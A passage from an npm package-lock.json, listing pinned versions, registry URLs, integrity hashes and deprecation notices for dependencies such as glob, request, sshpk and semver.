"https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "dependencies": { "assert-plus": "^1.0.0" } }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" }, "engines": { "node": "*" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "dependencies": { "natives": "^1.1.3" }, "engines": { "node": ">=0.4.0" } }, "node_modules/har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", "engines": { "node": ">=4" } }, "node_modules/har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "deprecated": "this library is no longer supported", "dependencies": { "ajv": "^6.12.3", "har-schema": "^2.0.0" }, "engines": { "node": ">=6" } }, "node_modules/has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "node_modules/hasown": { "version": "2.0.1", "resolved": 
"https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "dependencies": { "function-bind": "^1.1.2" }, "engines": { "node": ">= 0.4" } }, "node_modules/hosted-git-info": { "version": "2.8.9", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==" }, "node_modules/http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "dependencies": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" }, "engines": { "node": ">=0.8", "npm": ">=1.3.7" } }, "node_modules/inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "dependencies": { "once": "^1.3.0", "wrappy": "1" } }, "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "node_modules/is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "dependencies": { "hasown": "^2.0.0" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": 
"sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "node_modules/isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "node_modules/isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "node_modules/jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "node_modules/json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "node_modules/json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "node_modules/json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "node_modules/jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": 
"sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "dependencies": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" }, "engines": { "node": ">=0.6.0" } }, "node_modules/mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "engines": { "node": ">= 0.6" } }, "node_modules/mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dependencies": { "mime-db": "1.52.0" }, "engines": { "node": ">= 0.6" } }, "node_modules/minimatch": { "version": "3.1.5", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", "integrity": "sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==", "dependencies": { "brace-expansion": "^1.1.7" }, "engines": { "node": "*" } }, "node_modules/minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "dependencies": { "minimist": "^1.2.6" }, "bin": { "mkdirp": "bin/cmd.js" } }, "node_modules/natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==", "deprecated": "This module relies 
on Node.js's internals and will break at some point. Do not use it, and update to graceful-fs@4.x." }, "node_modules/normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "dependencies": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "node_modules/npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "dependencies": { "hosted-git-info": "^1.5.3", "semver": "4" } }, "node_modules/npm-package-arg/node_modules/hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" }, "node_modules/npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "dependencies": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" }, "optionalDependencies": { "npmlog": "" } }, "node_modules/npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "dependencies": 
{ "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", "engines": { "node": "*" } }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "dependencies": { "wrappy": "1" } }, "node_modules/path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", "engines": { "node": ">=0.10.0" } }, "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "node_modules/performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "node_modules/process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "node_modules/psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "node_modules/punycode": { 
"version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", "engines": { "node": ">=6" } }, "node_modules/qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", "engines": { "node": ">=0.6" } }, "node_modules/readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "dependencies": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "node_modules/request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", "dependencies": { "aws-sign2": "~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" }, "engines": { "node": ">= 6" } }, "node_modules/resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": 
"sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "dependencies": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" }, "bin": { "resolve": "bin/resolve" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==", "engines": { "node": "*" } }, "node_modules/rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "dependencies": { "glob": "^7.1.3" }, "bin": { "rimraf": "bin.js" } }, "node_modules/safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "node_modules/safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "node_modules/semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==", "bin": { "semver": "bin/semver" } }, "node_modules/set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "node_modules/signal-exit": { "version": "4.1.0", "resolved": 
"https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true, "engines": { "node": ">=14" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==", "engines": { "node": "*" } }, "node_modules/spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "dependencies": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "node_modules/spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "dependencies": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "node_modules/sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "dependencies": { "asn1": "~0.2.3", 
"assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" }, "bin": { "sshpk-conv": "bin/sshpk-conv", "sshpk-sign": "bin/sshpk-sign", "sshpk-verify": "bin/sshpk-verify" }, "engines": { "node": ">=0.10.0" } }, "node_modules/string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dependencies": { "safe-buffer": "~5.1.0" } }, "node_modules/string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" }, "engines": { "node": ">=8" } }, "node_modules/strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "dependencies": { "ansi-regex": "^5.0.1" }, "engines": { "node": ">=8" } }, "node_modules/supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", "engines": { "node": ">= 0.4" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", 
"dependencies": { "psl": "^1.1.28", "punycode": "^2.1.1" }, "engines": { "node": ">=0.8" } }, "node_modules/tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "dependencies": { "safe-buffer": "^5.0.1" }, "engines": { "node": "*" } }, "node_modules/tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "node_modules/typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "node_modules/uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "dependencies": { "punycode": "^2.1.0" } }, "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "node_modules/uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. 
See https://v8.dev/blog/math-random for details.", "bin": { "uuid": "bin/uuid" } }, "node_modules/validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "dependencies": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "node_modules/verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "engines": [ "node >=0.6.0" ], "dependencies": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" } }, "node_modules/verror/node_modules/core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" }, "node_modules/wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "dependencies": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } }, "dependencies": { "ajv": { "version": "6.14.0", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.14.0.tgz", "integrity": "sha512-IWrosm/yrn43eiKqkfkHis7QioDleaXQHdDVPKg0FSwwd/DuvyX79TZnFOnYpB7dcsFAMmtFztZuXPDvSePkFw==", "requires": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" } }, 
